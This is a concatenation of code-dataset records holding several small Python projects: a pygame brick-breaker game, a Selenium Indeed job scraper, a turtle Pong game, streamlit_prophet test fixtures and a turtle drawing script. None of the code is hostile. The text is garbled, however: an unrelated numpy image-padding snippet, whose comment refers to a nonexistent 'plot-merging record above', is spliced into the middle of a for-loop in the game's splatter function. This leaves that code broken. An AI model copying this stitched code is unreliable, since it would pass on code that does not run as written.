pygame.image.load(\"assets/youdied.png\")\nyoudiedscaled = pygame.transform.scale(youdied, (SCREEN_WIDTH, SCREEN_HEIGHT))\n\nyoulose = pygame.image.load(\"assets/youlose.jpg\")\nyoulosescaled = pygame.transform.scale(youlose, (SCREEN_WIDTH, SCREEN_HEIGHT))\n\nloading = pygame.image.load(\"assets/loading.gif\")\nloadingscaled = pygame.transform.scale(loading, (SCREEN_WIDTH, SCREEN_HEIGHT))\n\ntitle = pygame.image.load(\"assets/title.png\")\ntitlescaled = pygame.transform.scale(title, (SCREEN_WIDTH, SCREEN_HEIGHT))\n\nvictory = pygame.image.load(\"assets/victory.png\")\nvictoryscaled = pygame.transform.scale(victory, (960, 540))\n\ninstructions = pygame.image.load(\"assets/instructions.png\")\ninstructionsscaled = pygame.transform.scale(instructions, (SCREEN_WIDTH, SCREEN_HEIGHT))\n\nheart = pygame.image.load(\"assets/heart.png\")\nheartscaled = pygame.transform.scale(heart, (30, 30))\n\n# create sprite groups\nplatforms = pygame.sprite.Group()\nballs = pygame.sprite.Group()\npowerups = pygame.sprite.Group()\nenemies = pygame.sprite.Group()\nblood = pygame.sprite.Group()\nbullets = pygame.sprite.Group()\n\n# declare functions\ndef addenemy(x, y, size):\n enemies.add(Enemy(x, y, size))\n\ndef spawnenemies(count, size, xspacing, yspacing):\n enemyxspacing = xspacing + size\n enemyyspacing = yspacing + size\n enemycontainer = SCREEN_WIDTH - (2*size)\n for i in range(count):\n x = ((enemyxspacing)*i) % enemycontainer\n y = (enemyyspacing)*(1 + floor((enemyxspacing)*i/enemycontainer))\n addenemy(x, y, size)\n\ndef spawnballs(count, x, y, size, velocity, angle):\n for i in range(count):\n balls.add(Ball(x, y, size, velocity, angle))\n\ndef splatter(count, centerx, centery):\n for i in 
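# The plot-merging record above equalizes image sizes with np.pad and a
# (before, after) fill per axis. The same move in isolation for an H x W x 4
# RGBA array padded on the right with opaque white:
import numpy as np

def pad_to_width(img: np.ndarray, width: int) -> np.ndarray:
    right = width - img.shape[1]
    # pad axis 1 (columns) only; 255 fills every channel
    return np.pad(img, ((0, 0), (0, right), (0, 0)),
                  mode='constant', constant_values=255)

assert pad_to_width(np.zeros((4, 3, 4), dtype=np.uint8), 5).shape == (4, 5, 4)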
range(count):\n blood.add(Bloodsplatter(centerx, centery))\n\n# declare all classes (this is long - ends at line 554)\nclass Platform(pygame.sprite.Sprite):\n\n def __init__(self, xcenter, y):\n super().__init__()\n\n self.defaultw = 150\n self.width = self.defaultw\n self.activeheight = round(self.width/92*9)\n\n # image size 92 x 9\n # platform width 78 (centered)\n\n\n self.PFnonenone = pygame.image.load(\"assets/platform/PFnonenone.png\").convert_alpha()\n self.PFnonehalf = pygame.image.load(\"assets/platform/PFnonehalf.png\").convert_alpha()\n self.PFnonefull = pygame.image.load(\"assets/platform/PFnonefull.png\").convert_alpha()\n self.currentimg = self.PFnonenone\n self.image = pygame.transform.scale(self.currentimg, (self.width, self.activeheight))\n self.rect = self.image.get_rect()\n\n self.rect.centerx = xcenter\n self.rect.y = y\n\n self.maxspd = 5\n self.speed = 0\n\n self.accel = 0.5\n self.hasmoved = False\n\n self.growcooldown = 0\n self.speedcooldown = 0\n\n def move(self, xchange, ychange):\n self.rect.x += xchange\n self.rect.y += ychange\n\n def runmovement(self):\n\n keys_pressed = pygame.key.get_pressed()\n\n self.hasmoved = False\n # if not left and right keys at once\n if not ((keys_pressed[pygame.K_LEFT] or keys_pressed[pygame.K_a]) and (keys_pressed[pygame.K_RIGHT] or keys_pressed[pygame.K_d])):\n # if leftwards inputs\n if keys_pressed[pygame.K_LEFT] or keys_pressed[pygame.K_a]:\n # accelerate to the left\n self.speed = max(-1*self.maxspd, self.speed - self.accel)\n self.hasmoved = True\n # if rightwards inputs\n if keys_pressed[pygame.K_RIGHT] or keys_pressed[pygame.K_d]:\n # accelerate to the right\n self.speed = min(self.maxspd, self.speed + self.accel)\n self.hasmoved = True\n\n if not self.hasmoved:\n if self.speed != 0:\n if self.speed < 0:\n self.speed += self.accel\n else:\n self.speed -= self.accel\n if self.rect.x > 0 and self.speed < 0:\n self.move(self.speed, 0)\n if self.rect.x + self.rect.width < SCREEN_WIDTH and self.speed > 0:\n self.move(self.speed, 0) \n\n def lenset(self, width):\n self.width = width\n self.activeheight = max(round(width/92*9), 15)\n tempxcenter = self.rect.centerx\n self.image = pygame.transform.scale(self.currentimg, (width, self.activeheight))\n self.rect.h = self.image.get_height()\n self.rect.w = self.image.get_width()\n self.rect.centerx = tempxcenter\n\n def reset(self):\n self.width = self.defaultw\n self.rect.centerx = 500\n self.rect.y = 630\n self.maxspd = 5\n self.speed = 0\n self.lenset(self.width)\n self.growcooldown = 0\n self.speedcooldown = 0\n\n def checkcooldowns(self):\n if self.growcooldown > 0:\n self.growcooldown -= 1\n if self.growcooldown == 0:\n self.lenset(self.width)\n if self.speedcooldown > 0:\n self.speedcooldown -= 1\n if self.speedcooldown == 0:\n self.accel = 0.5\n self.maxspd = 5\n self.speed = 0\n\n def setblasters(self):\n\n if self.speed != 0:\n\n if self.speed == self.maxspd:\n self.currentimg = pygame.transform.flip(self.PFnonefull, True, False)\n elif self.speed*-1 == self.maxspd:\n self.currentimg = self.PFnonefull\n\n elif self.speed > 0:\n self.currentimg = pygame.transform.flip(self.PFnonehalf, True, False)\n else:\n self.currentimg = self.PFnonehalf\n\n else:\n self.currentimg = self.PFnonenone\n\n self.image = pygame.transform.scale(self.currentimg, (self.rect.width, self.activeheight))\n\n def update(self):\n\n self.checkcooldowns()\n\n keys_pressed = pygame.key.get_pressed()\n\n self.runmovement()\n\n self.setblasters()\n\nclass Ball(pygame.sprite.Sprite):\n\n def __init__(self, 
xcenter, ycenter, size, velocity, angle):\n super().__init__()\n\n self.size = size\n\n self.og_ball = pygame.image.load(\"assets/ball.png\").convert_alpha()\n self.og_powerball = pygame.image.load(\"assets/powerball.png\").convert_alpha()\n self.image = pygame.transform.scale(self.og_ball, (self.size, self.size))\n self.rect = self.image.get_rect()\n\n\n self.realx = xcenter - (self.size/2)\n self.realy = ycenter - (self.size/2)\n self.rect.x = int(self.realx)\n self.rect.y = int(self.realy)\n\n self.velocity = velocity\n self.angle = randrange(0, 900)/10+45\n\n self.firecooldown = 0\n\n def move(self, xchange, ychange):\n self.realx += xchange\n self.realy += ychange\n self.rect.x = int(self.realx)\n self.rect.y = int(self.realy)\n\n def selfspawnballs(self, count, x, y, size, velocity, angle):\n for i in range(count):\n balls.add(Ball(x, y, size, velocity, angle))\n\n def resetballs(self):\n for ball in balls:\n ball.realx = 500 - (ball.size/2)\n ball.realy = 628 - ball.size\n ball.velocity = 0\n ball.angle = randrange(0, 90)+45\n ball.size = 20\n ball.firecooldown = 0\n\n def checkcooldowns(self):\n if self.firecooldown > 0:\n self.firecooldown -= 1\n\n\n def getx(self, angle):\n return cos(radians(self.angle))*self.velocity\n\n def gety(self, angle):\n return sin(radians(self.angle))*self.velocity*-1\n\n def verticalbounce(self):\n self.angle = (90 - self.angle) + 90\n\n def horizontalbounce(self):\n self.angle = (180 - self.angle) + 180\n\n def multiball(self):\n self.selfspawnballs(2, self.rect.x, self.rect.y, self.size, 5, randrange(0, 900)/10+45)\n\n def bounceonedges(self):\n if ((self.rect.x + self.size) >= SCREEN_WIDTH):\n self.rect.right = SCREEN_WIDTH + 1\n self.verticalbounce()\n elif ((self.rect.x) <= 0):\n self.rect.x = 1\n if 90 <= (self.angle % 360) <= 270:\n self.verticalbounce()\n if ((self.rect.y) < 0):\n self.rect.y = 1\n if 0 <= (self.angle % 360) <= 180:\n self.horizontalbounce()\n\n def updatepowers(self):\n if self.firecooldown > 0:\n self.firecooldown -= 1\n self.image = pygame.transform.scale(self.og_powerball, (self.size, self.size))\n else:\n self.image = pygame.transform.scale(self.og_ball, (self.size, self.size))\n\n def collidewplatform(self, platform):\n if pygame.sprite.collide_rect(self, platform):\n\n if platform.rect.top < (self.rect.bottom - self.gety(self.angle) - 1):\n self.verticalbounce()\n else:\n self.horizontalbounce()\n\n ballpospercent = ((self.rect.centerx - platform.rect.x)/platform.rect.width)*100\n self.angle -= (ballpospercent - 50)/3 - 360\n\n def collidewenemies(self, enemies, Powerup):\n\n enemies_hit = pygame.sprite.spritecollide(self, enemies, True)\n\n for enemy in enemies_hit:\n if random() >= 0.85:\n Powerup.addpowerup(enemy.rect.x, enemy.rect.y, 40, randrange(1, 5))\n splatter(30, enemy.rect.centerx, enemy.rect.centery)\n\n if len(enemies_hit) == 2:\n if enemies_hit[0].rect.x == enemies_hit[1].rect.x:\n if self.firecooldown <= 0:\n self.verticalbounce()\n elif enemies_hit[0].rect.y == enemies_hit[1].rect.y:\n if self.firecooldown <= 0:\n self.horizontalbounce()\n else:\n if self.firecooldown <= 0:\n self.verticalbounce()\n self.horizontalbounce()\n else:\n for enemy in enemies_hit:\n if abs(self.rect.centerx - enemy.rect.centerx) > abs(self.rect.centery - enemy.rect.centery):\n if self.firecooldown <= 0:\n self.verticalbounce()\n else:\n if self.firecooldown <= 0:\n self.horizontalbounce()\n\n\n def update(self, platform, enemies, Powerup, immortal):\n\n if self.rect.y > SCREEN_HEIGHT:\n if not immortal:\n balls.remove(self)\n 
else:\n self.rect.bottom = SCREEN_HEIGHT\n self.horizontalbounce()\n\n self.updatepowers()\n\n self.move(self.getx(self.angle), self.gety(self.angle))\n\n if platform.hasmoved: \n self.velocity = 5\n\n self.bounceonedges()\n\n self.collidewplatform(platform)\n\n if self.velocity != 0 and pygame.sprite.spritecollide(self, enemies, False):\n self.collidewenemies(enemies, Powerup)\n splat.play()\n\nclass Enemy(pygame.sprite.Sprite):\n\n def __init__(self, x, y, size):\n super().__init__()\n\n self.size = size\n\n og_image = pygame.image.load(\"assets/enemy2.png\").convert_alpha()\n self.image = pygame.transform.scale(og_image, (self.size, self.size))\n self.rect = self.image.get_rect()\n\n\n self.realx = x\n self.realy = y\n self.rect.x = int(self.realx)\n self.rect.y = int(self.realy)\n\n self.movecycle = 0\n\n def shoot(self, platform):\n xdiff = platform.rect.centerx - self.rect.x\n ydiff = platform.rect.centery - self.rect.y\n\n # a^2 + b^2 = c^2\n\n # a is x, b is y\n\n # let x represent a/b\n\n # solve for b because y is always positive\n\n # n = x**2 + 1\n # b = (c * sqrt(n))/n\n\n c = 3 # velocity of bullet\n\n x = xdiff/ydiff\n n = x**2 + 1\n b = (c * sqrt(n))/n\n\n angle = degrees(atan(x))\n\n bullets.add(Bullet(self.rect.centerx, self.rect.bottom, x*b, b, angle))\n\n def update(self, platform):\n shootprobability = 0.015/len(enemies)\n if random() < shootprobability:\n self.shoot(platform)\n self.rect.x = self.realx + self.size + 20*sin(self.movecycle)\n self.movecycle += 0.03\n\nclass Bullet(pygame.sprite.Sprite):\n def __init__(self, xcenter, y, xchange, ychange, angle):\n super().__init__()\n\n og_bullet = pygame.image.load(\"assets/bullet.png\").convert_alpha()\n self.image = pygame.transform.rotate(pygame.transform.scale(og_bullet, (10, 20)), angle)\n self.rect = self.image.get_rect()\n\n self.realxcenter = xcenter\n self.realy = y\n\n self.rect.centerx = self.realxcenter\n self.rect.y = self.realy\n\n self.xchange = xchange\n self.ychange = ychange\n\n def update(self, platform, immortal):\n self.realxcenter += self.xchange\n self.realy += self.ychange\n\n self.rect.centerx = round(self.realxcenter)\n self.rect.y = round(self.realy)\n\n if self.rect.y >= SCREEN_HEIGHT:\n bullets.remove(self)\n\n if pygame.sprite.spritecollide(platform, bullets, True) and not immortal:\n if not dead:\n platform.lenset(platform.rect.w - 20)\n\nclass Powerup(pygame.sprite.Sprite):\n\n def __init__(self, x, y, size, power):\n super().__init__()\n\n self.size = size\n\n\n # POWER VALUES:\n # 1 = grow mushroom\n # 2 = fast platform\n # 3 = multiball\n self.power = power\n\n if self.power == 1:\n og_mushroom = pygame.image.load(\"assets/mushroom.png\").convert_alpha()\n self.image = pygame.transform.scale(og_mushroom, (self.size, self.size))\n self.rect = self.image.get_rect() \n if self.power == 2:\n og_swiftness = pygame.image.load(\"assets/swiftness.png\").convert_alpha()\n self.image = pygame.transform.scale(og_swiftness, (self.size, self.size))\n self.rect = self.image.get_rect()\n if self.power == 3:\n og_multiball = pygame.image.load(\"assets/multiball.png\").convert_alpha()\n self.image = pygame.transform.scale(og_multiball, (self.size, self.size))\n self.rect = self.image.get_rect()\n if self.power == 4:\n og_fireflower = pygame.image.load(\"assets/fireflower.png\").convert_alpha()\n self.image = pygame.transform.scale(og_fireflower, (self.size, self.size))\n self.rect = self.image.get_rect()\n\n\n self.realx = x\n self.realy = y\n self.rect.x = int(self.realx)\n self.rect.y = 
int(self.realy)\n\n def move(self, xchange, ychange):\n self.realx += xchange\n self.realy += ychange\n self.rect.x = int(self.realx)\n self.rect.y = int(self.realy)\n\n def addpowerup(x, y, size, power):\n powerups.add(Powerup(x, y, size, power))\n\n def xcenter(self):\n return self.rect.x + (self.size/2)\n\n def ycenter(self):\n return self.rect.y + (self.size/2)\n\n def dopower(self, platforms, balls):\n if self.power == 1:\n for platform in platforms:\n platform.lenset(platform.rect.w + 75)\n platform.growcooldown = 150\n elif self.power == 2:\n for platform in platforms:\n platform.maxspd = 10\n platform.accel = 1\n platform.speedcooldown = 1500\n elif self.power == 3:\n for ball in balls:\n ball.multiball()\n elif self.power == 4:\n for ball in balls:\n ball.firecooldown = 400\n\n def update(self, platforms, balls):\n self.move(0, 2)\n if pygame.sprite.spritecollide(self, platforms, False):\n self.dopower(platforms, balls)\n powerups.remove(self)\n\nclass Bloodsplatter(pygame.sprite.Sprite):\n def __init__(self, xcenter, ycenter):\n super().__init__()\n\n og_blood = pygame.image.load(\"assets/blood.png\")\n self.image = pygame.transform.scale(og_blood, (randint(5, 20), randint(5, 20)))\n self.rect = self.image.get_rect()\n\n self.rect.centerx = xcenter\n self.rect.centery = ycenter\n\n self.realw = self.rect.w\n self.realh = self.rect.h\n\n self.angle = randint(1, 361)\n\n self.velocity = 2\n\n def getx(self, angle):\n return cos(radians(self.angle))*self.velocity\n\n def gety(self, angle):\n return sin(radians(self.angle))*self.velocity*-1\n\n def update(self):\n self.rect.centerx += self.getx(self.angle)\n self.rect.centery += self.gety(self.angle)\n self.realw -= 0.7\n self.realh -= 0.7\n self.rect.h = round(self.realh)\n self.rect.w = round(self.realw)\n if self.rect.w <= 0 or self.rect.h <= 0:\n blood.remove(self)\n\n\ntitlescreen = True\nlosescreen = False\nmaingame = False\ninstructions = False\nyoulose = False\n\n\n\npygame.mixer.music.play(-1, 0, 0)\n\n\n# main game loop\nwhile True:\n\n\n # get user inputs\n for event in pygame.event.get():\n if event.type == pygame.QUIT: # when user clicks the 'x' on the window, close the game\n pygame.quit()\n sys.exit()\n\n keys_pressed = pygame.key.get_pressed()\n mouse_buttons = pygame.mouse.get_pressed()\n\n\n if titlescreen:\n screen.blit(titlescaled, (0, 0))\n if keys_pressed[pygame.K_s]:\n screen.blit(loadingscaled, (0, 0))\n maingame = True\n if keys_pressed[pygame.K_i]:\n maingame = False\n titlescreen = False\n instructions = True\n title = False\n youlose = False\n\n\n if instructions:\n screen.blit(instructionsscaled, (0, 0))\n if keys_pressed[pygame.K_ESCAPE]:\n instructions = False\n titlescreen = True\n maingame = False\n youlose = False\n\n \n if losescreen:\n screen.blit(youlosescaled, (0, 0))\n\n if mouse_buttons[0]:\n instructions = False\n titlescreen = True\n maingame = False\n losescreen = False\n click.play()\n screen.blit(loadingscaled, (0, 0))\n\n\n if maingame:\n # create starting objects\n platform = Platform(500, 630)\n platforms.add(platform)\n spawnenemies(60, 50, 10, 5)\n spawnballs(ballcount, platform.rect.centerx, ballspawny, ballsize, 0, randrange(0, 900)/10+45)\n lives = 3\n dead = False\n\n while maingame:\n \"\"\"\n EVENTS section - how the code reacts when users do things\n \"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT: # when user clicks the 'x' on the window, close the game\n pygame.quit()\n sys.exit()\n\n # get user inputs\n keys_pressed = pygame.key.get_pressed()\n 
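# mouse position/buttons are polled each frame for the respawn and exit buttons handled below\n            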
mouse_pos = pygame.mouse.get_pos()\n mousex = mouse_pos[0]\n mousey = mouse_pos[1]\n mouse_buttons = pygame.mouse.get_pressed()\n\n # respawn button\n if dead and (((184 <= mousex <= 820) and (360 <= mousey <= 424) and mouse_buttons[0]) or keys_pressed[pygame.K_r]):\n balls.empty()\n platform.reset()\n click.play()\n spawnballs(ballcount, platform.rect.centerx, ballspawny, ballsize, 0, randrange(0, 900)/10+45)\n dead = False\n if dead and (((184 <= mousex <= 820) and (437 <= mousey <= 500) and mouse_buttons[0]) or keys_pressed[pygame.K_ESCAPE]):\n maingame = False\n titlescreen = True\n losescreen = False\n platforms.empty()\n balls.empty()\n enemies.empty()\n bullets.empty()\n blood.empty()\n powerups.empty()\n\n\n \"\"\"\n UPDATE section - manipulate everything on the screen\n \"\"\"\n\n platform.update()\n enemies.update(platform)\n balls.update(platform, enemies, Powerup, immortal)\n powerups.update(platforms, balls)\n bullets.update(platform, immortal)\n blood.update()\n if len(balls) < 1 or platform.rect.w < 40:\n if not dead:\n if lives > 1:\n lives -= 1\n else:\n maingame = False\n titlescreen = False\n losescreen = True\n platforms.empty()\n balls.empty()\n enemies.empty()\n bullets.empty()\n blood.empty()\n powerups.empty()\n dead = True\n\n if maingame:\n \"\"\"\n DRAW section - make everything show up on screen\n \"\"\"\n screen.blit(bg, (0, 0))\n\n if platform.speedcooldown > 0:\n screen.blit(speedfade, (0, 605))\n\n enemies.draw(screen)\n balls.draw(screen)\n platforms.draw(screen)\n powerups.draw(screen)\n bullets.draw(screen)\n blood.draw(screen)\n\n if dead and not len(enemies) < 1:\n screen.blit(youdiedscaled, (0, 0))\n\n if len(enemies) < 1:\n vicy = sin(victorywave)\n screen.blit(victoryscaled, (20, vicy*100 + 80))\n immortal = True\n victorywave += 0.03\n\n for i in range(lives):\n screen.blit(heartscaled, (10+30*i, 660))\n\n pygame.display.flip() # Pygame uses a double-buffer, without this we see half-completed frames\n\n clock.tick(FRAME_RATE) # Pause the clock to always maintain FRAME_RATE frames per second\n\n pygame.display.flip()\n","repo_name":"lambpasta/brickinvaders","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":22487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21801509355","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom bs4 import BeautifulSoup\n\ndef get_page_count(keyword):\n options = Options()\n options.add_argument(\"--no-sandbox\")\n options.add_argument(\"--disable-dev-shm-usage\")\n \n browser = webdriver.Chrome(options=options)\n base_url = \"https://kr.indeed.com/jobs?q=\"\n browser.get(f\"{base_url}{keyword}\")\n soup = BeautifulSoup(browser.page_source, \"html.parser\")\n pagination = soup.find(\"nav\", class_=\"ecydgvn0\")\n if pagination == None:\n return 1 # 반환할 페이지 수\n pages = pagination.find_all(\"div\", class_=\"ecydgvn1\", recursive=False)\n count = len(pages)\n if count >= 5:\n return 5\n else:\n return count\n\n\ndef extract_indeed_jobs(keyword):\n pages = get_page_count(keyword)\n results = []\n for page in range(pages):\n options = Options()\n options.add_argument(\"--no-sandbox\")\n options.add_argument(\"--disable-dev-shm-usage\")\n \n browser = webdriver.Chrome(options=options)\n \n base_url = \"https://kr.indeed.com/jobs\"\n \n browser.get(f\"{base_url}?q={keyword}&start={page*10}\")\n \n soup = BeautifulSoup(browser.page_source, \"html.parser\")\n job_list = soup.find(\"ul\", 
class_=\"jobsearch-ResultsList\")\n jobs = job_list.find_all('li', recursive=False)\n for job in jobs:\n zone = job.find(\"div\", class_=\"mosaic-zone\")\n if zone == None:\n anchor = job.select_one(\"h2 a\")\n title = anchor['aria-label']\n link = anchor['href']\n company = job.find(\"span\", class_=\"companyName\")\n location = job.find(\"div\", class_=\"companyLocation\")\n job_data = {\n 'link' : f\"http://kr.indeed.com{link}\",\n 'company' : company.string.replace(\",\", \" \"),\n 'location' : location.string.replace(\",\", \" \"),\n 'position' : title.replace(\",\", \" \")\n \n }\n results.append(job_data)\n return results\n","repo_name":"shunchae/job_scrapper","sub_path":"extractors/indeed.py","file_name":"indeed.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41808978998","text":"# Simple Pong Game\n\nimport turtle\n\n\ndef paddle_l_up():\n y = paddle_l.ycor()\n print(y)\n if y >= 240:\n return\n y += 20\n paddle_l.sety(y)\n\n\ndef paddle_l_down():\n y = paddle_l.ycor()\n print(y)\n if y <= -240:\n return\n y -= 20\n paddle_l.sety(y)\n\n\ndef paddle_r_up():\n y = paddle_r.ycor()\n print(y)\n if y >= 240:\n return\n y += 20\n paddle_r.sety(y)\n\n\ndef paddle_r_down():\n y = paddle_r.ycor()\n print(y)\n if y <= -240:\n return\n y -= 20\n paddle_r.sety(y)\n\n\nwn = turtle.Screen()\nwn.title(\"Pong by @danilrespati\")\nwn.bgcolor(\"black\")\nwn.setup(width=800, height=600)\nwn.tracer()\n\n# Paddle L\npaddle_l = turtle.Turtle()\npaddle_l.speed(0)\npaddle_l.color(\"white\")\npaddle_l.shape(\"square\")\npaddle_l.shapesize(stretch_wid=5, stretch_len=1)\npaddle_l.penup()\npaddle_l.goto(-350, 0)\n\n# Paddle R\npaddle_r = turtle.Turtle()\npaddle_r.speed(0)\npaddle_r.color(\"white\")\npaddle_r.shape(\"square\")\npaddle_r.shapesize(stretch_wid=5, stretch_len=1)\npaddle_r.penup()\npaddle_r.goto(+350, 0)\n\n# Ball\nball = turtle.Turtle()\nball.speed(0)\nball.color(\"white\")\nball.shape(\"square\")\nball.penup()\nball.goto(0, 0)\n\nwn.listen()\nwn.onkeypress(paddle_l_up, \"w\")\nwn.onkeypress(paddle_l_down, \"s\")\nwn.onkeypress(paddle_r_up, \"Up\")\nwn.onkeypress(paddle_r_down, \"Down\")\n\n# Main game loop\nwhile True:\n wn.update()\n","repo_name":"danilrespati/Course","sub_path":"Python/Pong Game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71705805240","text":"from typing import Any, Dict, Optional\n\nimport numpy as np\nimport pandas as pd\nfrom streamlit_prophet.lib.utils.load import load_config\n\nconfig, _, _ = load_config(\n \"config_streamlit.toml\", \"config_instructions.toml\", \"config_readme.toml\"\n)\n\n\ndef make_test_df(\n ds: Optional[Dict[Any, Any]] = None,\n cols: Optional[Dict[Any, Any]] = None,\n start: str = \"2010-01-01\",\n end: str = \"2020-01-01\",\n freq: str = \"D\",\n range: int = 10,\n) -> pd.DataFrame:\n \"\"\"Creates a sample dataframe with specifications defined by the arguments, for testing purpose.\n\n Parameters\n ----------\n ds : Optional[dict]\n Specifications for date column.\n cols : Optional[dict]\n Specifications for other columns.\n start : str\n Start date for date column.\n end : str\n End date for date column.\n freq : str\n Frequency for date column.\n range : int\n Range for numerical columns.\n\n Returns\n -------\n pd.DataFrame\n Dataframe that will be used for unit tests.\n \"\"\"\n df = 
pd.DataFrame()\n if ds is not None:\n df[\"ds\"] = pd.date_range(\n start=start if \"start_date\" not in ds.keys() else ds[\"start_date\"],\n end=end if \"end_date\" not in ds.keys() else ds[\"end_date\"],\n freq=freq if \"freq\" not in ds.keys() else ds[\"freq\"],\n )\n if \"str\" in ds.keys():\n df[\"ds\"] = df[\"ds\"].map(lambda x: x.strftime(ds[\"str\"]))\n if \"frac_nan\" in ds.keys():\n df.loc[df.sample(frac=ds[\"frac_nan\"]).index, \"ds\"] = np.nan\n if cols is not None:\n N = len(df) if len(df) > 0 else 1000\n for col in cols.keys():\n if \"cat\" in cols[col].keys():\n df[col] = np.random.choice(a=cols[col][\"cat\"], size=N)\n else:\n range = range if \"range\" not in cols[col].keys() else cols[col][\"range\"]\n df[col] = np.random.randn(1, N).ravel() * range\n if \"abs\" in cols[col].keys():\n df[col] = abs(df[col])\n if \"frac_nan\" in cols[col].keys():\n df.loc[df.sample(frac=cols[col][\"frac_nan\"]).index, col] = np.nan\n return df\n\n\n# Synthetic categorical variables\nint_long_target = list(range(1, config[\"validity\"][\"min_target_cardinality\"] + 2))\nint_short_target = list(range(1, config[\"validity\"][\"min_target_cardinality\"] - 1))\nint_long_cat = list(range(1, config[\"validity\"][\"max_cat_reg_cardinality\"] + 2))\nint_short_cat = list(range(1, config[\"validity\"][\"max_cat_reg_cardinality\"] - 1))\nstr_long_target = [\n chr(ord(\"@\") + i) for i in range(1, config[\"validity\"][\"min_target_cardinality\"] + 2)\n]\nstr_short_target = [\n chr(ord(\"@\") + i) for i in range(1, config[\"validity\"][\"min_target_cardinality\"] - 1)\n]\nstr_long_cat = [\n chr(ord(\"@\") + i) for i in range(1, config[\"validity\"][\"max_cat_reg_cardinality\"] + 2)\n]\nstr_short_cat = [\n chr(ord(\"@\") + i) for i in range(1, config[\"validity\"][\"max_cat_reg_cardinality\"] - 1)\n]\n\n# Test dataframes\ndf_test = dict()\ndf_test[0] = pd.DataFrame()\ndf_test[1] = make_test_df(\n cols={0: {\"cat\": [\"A\", \"B\", \"C\"]}, 1: {\"cat\": [\"A\", \"B\"]}, 2: {\"cat\": [\"A\"]}, 3: {}}\n)\ndf_test[2] = make_test_df(\n cols={0: {\"cat\": [\"A\"], \"frac_nan\": 1}, 1: {\"cat\": [\"A\"], \"frac_nan\": 0.1}, 2: {\"cat\": [\"A\"]}}\n)\ndf_test[3] = make_test_df(cols={\"y\": {\"cat\": int_short_target}})\ndf_test[4] = make_test_df(cols={\"y\": {\"cat\": int_short_target, \"frac_nan\": 0.1}})\ndf_test[5] = make_test_df(cols={\"y\": {\"cat\": int_short_target, \"frac_nan\": 1}})\ndf_test[6] = make_test_df(cols={\"y\": {\"cat\": str_long_target}})\ndf_test[7] = make_test_df(cols={\"y\": {\"cat\": str_long_target, \"frac_nan\": 0.1}})\ndf_test[8] = make_test_df(ds={}, cols={\"y\": {\"cat\": int_long_target}})\ndf_test[9] = make_test_df(\n ds={\"str\": \"%Y-%m-%d\"}, cols={\"y\": {\"cat\": int_long_target, \"frac_nan\": 0.1}}\n)\ndf_test[10] = make_test_df(ds={\"freq\": \"Y\"}, cols={\"y\": {\"range\": 100}})\ndf_test[11] = make_test_df(ds={\"freq\": \"H\"}, cols={\"y\": {\"range\": 1, \"abs\": True}})\ndf_test[12] = make_test_df(ds={\"frac_nan\": 0.1}, cols={\"y\": {\"range\": 1, \"frac_nan\": 0.1}})\ndf_test[13] = make_test_df(\n cols={\n 0: {},\n 1: {\"frac_nan\": 0.1},\n 2: {\"frac_nan\": 1},\n 3: {\"abs\": True},\n 4: {\"cat\": int_short_cat},\n 5: {\"cat\": int_short_cat, \"frac_nan\": 0.1},\n 6: {\"cat\": str_short_cat, \"frac_nan\": 0.1},\n }\n)\ndf_test[14] = lambda x: make_test_df(\n ds={\"freq\": x},\n cols={\n \"y\": {},\n 0: {},\n 1: {\"frac_nan\": 0.1},\n 2: {\"frac_nan\": 1},\n 3: {\"abs\": True},\n 4: {\"cat\": int_short_cat},\n 5: {\"cat\": int_short_cat, \"frac_nan\": 0.1},\n 6: 
{\"cat\": str_short_cat, \"frac_nan\": 0.1},\n 7: {\"cat\": str_long_cat},\n 8: {\"cat\": int_long_cat},\n 9: {\"cat\": str_long_cat, \"frac_nan\": 0.1},\n 10: {\"cat\": int_long_cat, \"frac_nan\": 0.1},\n 11: {\"cat\": [\"A\"]},\n 12: {\"cat\": [\"A\"], \"frac_nan\": 0.1},\n },\n)\ndf_test[15] = make_test_df(cols={\"y\": {\"cat\": [2]}})\ndf_test[16] = make_test_df(cols={\"y\": {\"cat\": [3]}})\ndf_test[17] = make_test_df(ds={}, cols={\"truth\": {}, \"forecast\": {}})\ndf_test[18] = make_test_df(ds={}, cols={\"truth\": {\"frac_nan\": 1}, \"forecast\": {\"frac_nan\": 1}})\ndf_test[19] = make_test_df(ds={\"freq\": \"W\"}, cols={\"truth\": {\"frac_nan\": 0.1}, \"forecast\": {}})\ndf_test[20] = make_test_df(ds={}, cols={\"y\": {}, \"regressor1\": {}, \"regressor2\": {\"cat\": [0, 1]}})\n","repo_name":"artefactory/streamlit_prophet","sub_path":"tests/samples/df.py","file_name":"df.py","file_ext":"py","file_size_in_byte":5428,"program_lang":"python","lang":"en","doc_type":"code","stars":225,"dataset":"github-code","pt":"40"} +{"seq_id":"39999940399","text":"import turtle\n\nrafa = turtle.Turtle()\nrafa.speed(0)\n\nfor i in range(360):\n\trafa.color(\"cyan\")\n\trafa.forward(400)\n\trafa.penup()\n\trafa.setposition(0,0)\n\trafa.pendown()\n\trafa.left(1)\n\nfor i in range(360):\n\trafa.color(\"blue\")\n\trafa.forward(150)\n\trafa.penup()\n\trafa.forward(150)\n\trafa.pendown()\n\trafa.forward(100)\n\trafa.penup()\n\trafa.setposition(0,0)\n\trafa.pendown()\n\trafa.left(1)\n\nfor i in range(360):\n\trafa.color(\"black\")\n\trafa.forward(100)\n\trafa.penup()\n\trafa.forward(250)\n\trafa.pendown()\n\trafa.forward(50)\n\trafa.penup()\n\trafa.setposition(0,0)\n\trafa.pendown()\n\trafa.left(1)\n\nturtle.done()","repo_name":"rafapoloni/Hello-World","sub_path":"turtle_05.py","file_name":"turtle_05.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24085139188","text":"import numpy as np\nimport os\nimport scipy.stats\nfrom numba import jit, njit\nfrom scipy.stats import gaussian_kde, kstest\nimport matplotlib.cm as cm\nimport matplotlib.pyplot as plt\nfrom solvers import direct_simulation, implicit_scheme\nimport statsmodels.api as 